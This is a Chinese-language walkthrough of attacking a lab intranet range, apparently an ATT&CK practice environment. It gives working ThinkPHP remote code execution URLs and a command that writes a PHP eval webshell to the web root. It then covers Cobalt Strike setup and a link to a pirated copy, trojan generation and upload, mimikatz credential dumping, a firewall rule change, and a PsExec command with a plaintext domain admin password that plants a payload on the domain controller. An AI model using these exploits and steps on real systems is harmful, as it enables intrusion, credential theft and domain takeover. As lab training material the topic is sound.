记一次内网渗透(ATT&CK第五个攻防靶场)
靶场下载地址:download
渗透测试
拿到题目打开是一个thinkphp框架
测试thinkphp版本
找到此版本漏洞的poc 可以命令执行
http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami
http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=powershell%20pwd
写一句话木马getshell
http://192.168.199.206/?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST['a']); ?^> > C:\phpStudy\PHPTutorial\WWW\public\shell.php
内 网 渗 透
主机信息收集
arp -a
ipconfig /all
看下ip,dns 为192.168.199.200 域名sun.com
ping一下sun.com
查看域用户
net user /domain
内网横向移动
接下来攻击域控就用cs(cobalt strike)来完成
cobalt strike4.0中文版
网盘链接
https://pan.baidu.com/s/1iVzO47G-aGzFoa82Zdoobw
提取码:kxyz
因为win7这台靶机可以出网,win2008不可以
要让我们win7上线
首先搭建cs环境
使用kali作为服务端
本机win10作为客户端
1.将下载好的cs解压到两台机器
kali下:
进入cs文件下使用root权限
sudo su root
chmod 777 teamserver
vim teamserver
修改服务端端口
默认为(50050)
我这里修改为12345
因为kali有防火墙
需要开放12345端口
sudo ufw allow 12345
./teamserver 192.168.199.207(kali的IP) 123456(cs服务密码后面连接需要用)
创建监听器
生成windows exe木马
选择监听器
生成木马
利用蚁剑将木马程序上传到win7靶机
在终端运行木马程序
cs中看到管理员已经上线
运行mimikatz 读到了域管理员的密码
提权
看到系统权限管理员已上线
扫一下内网可以用psexec登录的主机,基于ipc共享,要打开445端口才可以,所以扫一下445端口
(IPC共享:连接者可以与目标主机建立一个空的连接而无需用户名与密码(当然,对方机器必须开了ipc$共享,否则你是连接不上的),而利用这个空的连接,连接者还可以得到目标主机上的用户列表。)
(psexec:微软官方实用工具(如 Telnet)和远程控制程序(如 Symantec 的 PC Anywhere)使您可以在远程系统上执行程序,但安装它们非常困难,并且需要您在想要访问的远程系统上安装客户端软件。PsExec 是一个轻型的 telnet 替代工具,它使您无需手动安装客户端软件即可执行其他系统上的进程,并且可以获得与控制台应用程序相当的完全交互性。)
portscan 192.168.199.0/24 445 arp 50
portscan 网段 端口 协议(icmp arp none)线程
扫到了许多存活主机
192.168.199.200是目标DC
由于这里的DC主机是不能出网的 但是cs服务端又是架设在互联网的
这时候就要用已经上线主机做listener 来让DC主机上线
在win7上设置中转监听
shell netstat -ano |findstr 1596
再次生成木马程序
将psexec和木马程序上传至win7靶机
psexec工具下载链接:
https://download.sysinternals.com/files/PSTools.zip
由于win7开着防火墙,dc在连接1596端口时进不来
先手动添加防火墙规则
netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=1596
shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.199.200 -u sun\Administrator -p 123456789a. -d -c C:\phpStudy\PHPTutorial\WWW\public\win2008.exe
执行payload看到DC已经上线
运行mimikatz,得到win2008中admin的密码
接下来可以操作DC系统文件
上传文件
运行mimikatz,得到win2008中admin的密码
接下来可以操作DC系统文件
上传文件